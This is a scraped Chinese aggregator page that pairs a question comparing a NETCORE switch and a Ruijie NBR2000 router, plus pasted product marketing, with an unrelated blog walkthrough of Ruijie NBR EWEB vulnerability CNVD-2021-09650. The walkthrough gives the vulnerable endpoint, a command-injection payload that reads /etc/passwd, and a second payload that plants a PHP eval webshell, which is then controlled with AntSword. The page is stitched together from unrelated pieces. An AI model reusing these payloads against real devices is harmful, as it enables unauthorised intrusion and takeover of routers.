NETCORE交换机和锐捷NBR2000交换机那个好?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NETCORE交换机和锐捷NBR2000交换机那个好?相关的知识,希望对你有一定的参考价值。

NETCORE交换机是二+四层智能WEB交换机

RG-NBR2000是锐捷网络公司针对大型网吧推出的一款千兆核心宽带路由器,在网吧环境下,RG-NBR2000的带机数可达1000台。它采用64位高性能专用网络处理器,固化带有1个千兆和1个百兆以太网WAN口,1个千兆以太网LAN口,一个Console配置口,最大支持50万条的超大容量NAT并发会话。
注:下列描述参数若未特殊说明,默认为RG-NBR2000所具备。
网吧经营的基础:搭建一个高速、稳定的网络
从底层硬件架构保证:采用64位RISC高性能专用网络处理器,256M DDR内存,支持50万条超大容量的NAT会话数,内嵌锐捷网络自主研发的RGNOS网络操作平台,提供电信级网络产品的高性能和高稳定性。
重视设备线速转发能力:64bytes小包转发率高达700Mbps,可满足多条百兆光纤的线速转发。在100M的DDoS攻击下,依然可以实现64bytes小包的100M线速转发。
关注硬件设计和支持:支持硬件端口镜像功能,监控口在提供监控功能的同时不影响网络性能,并兼容常见信息监控过滤系统。内置电信级宽频开关电源,具有防雷、防过压、防浪涌设计,适应电压不稳定场合。
双启动映像文件:升级过程断电依然可以自动恢复,让您升级无忧。
网吧盈利的保障:做好内、外网的安全保护
全方位的ARP防御体系:通过扫描LAN口和“一键静态绑定”可迅速完成内网的IP/MAC静态绑定。支持关闭LAN口的MAC地址学习功能,拒绝非法用户上网。支持“可信任ARP”专利技术,实现动态ARP绑定和静态ARP绑定的完美结合。可智能验证ARP信息的真实性,即不需要进行静态绑定也不会被欺骗,同时还可以分等级显示存在ARP欺骗行为的主机信息,定位欺骗源。
抗DDoS攻击应对不正当竞争:具备100M DDoS攻击防御能力。在100M DDoS攻击下,CPU利用率不高于35%,依然可以实现小包的100M线速转发。
防内外网攻击和防IP/端口扫描:可防御目前几乎所有类型的攻击,如:SYN flood,UDP flood,ICMP flood,Smurf/Fraggle攻击,分片报文攻击等。同时可记录攻击主机的地址信息,定位攻击源;也可将内网攻击主机列入黑名单,禁止其上网功能,硬件过滤攻击报文,不占用CPU资源。
硬件防病毒:通过添加规则过滤病毒报文,支持自动检测冲击波和震荡波病毒。可识别并阻断机器狗病毒的中毒过程,同时显示试图访问带毒网站的主机信息和带毒网站的IP地址。NBR系列路由器是业内唯一彻底阻断机器狗病毒的路由器。
访问控制/过滤:支持标准和扩展ACL(访问控制列表),可根据指定的IP地址范围、端口范围进行数据包的检测和过滤,支持专家ACL和时间ACL。支持域名过滤,阻断对非法、恶意网站的访问,健康上网。

网吧盈利的关键:网吧定制的智能特性提升网民上网体验
灵活的内外网应用:1个千兆、1个百兆WAN口实现双ISP线路接入。VRRP热备份协议和基于Ping/DNS的线路检测,实现多台设备、多条宽带线路的负载均衡和线路备份。电信、网通自动选路功能,实现“电信数据自动走电信线路,网通数据自动走网通线路”。支持南方、北方选路策略,实用效果更好。
以上是NBR2000的功能介绍,星网锐捷的产品不错,这款是专门用在网吧的。
参考技术A 你拿这两个比我只能说锐杰的好了.

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
漏洞编号:
CNVD-2021-09650

漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

漏洞影响:
锐捷NBR路由器 EWEB网关系统

漏洞复现:

首先打开网关系统

然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt

接着我们访问url/test.txt 路径,查看文件。

回显了/etc/passwd路径下passwd文件的内容

利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

漏洞复现:

Payload :
mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php

将这句话execute一下。

然后我们直接上蚁剑连接就ok了

这边直接能看到我们上传的webshell

右击终端

然后就可以进一步的横向或者纵向,也可以进一步信息收集。

博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!

以上是关于NETCORE交换机和锐捷NBR2000交换机那个好?的主要内容,如果未能解决你的问题,请参考以下文章

关于锐捷交换机配置

锐捷交换机与路由器配置命令

锐捷交换机dhcp服务怎么配置?

网络搭建初学者。求锐捷三层、二层交换机配置命令。锐捷路由器配置命令。尽量全一些。路由器的重启方法。

三家交换机配置命令详解(华为、H3C、锐捷)

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell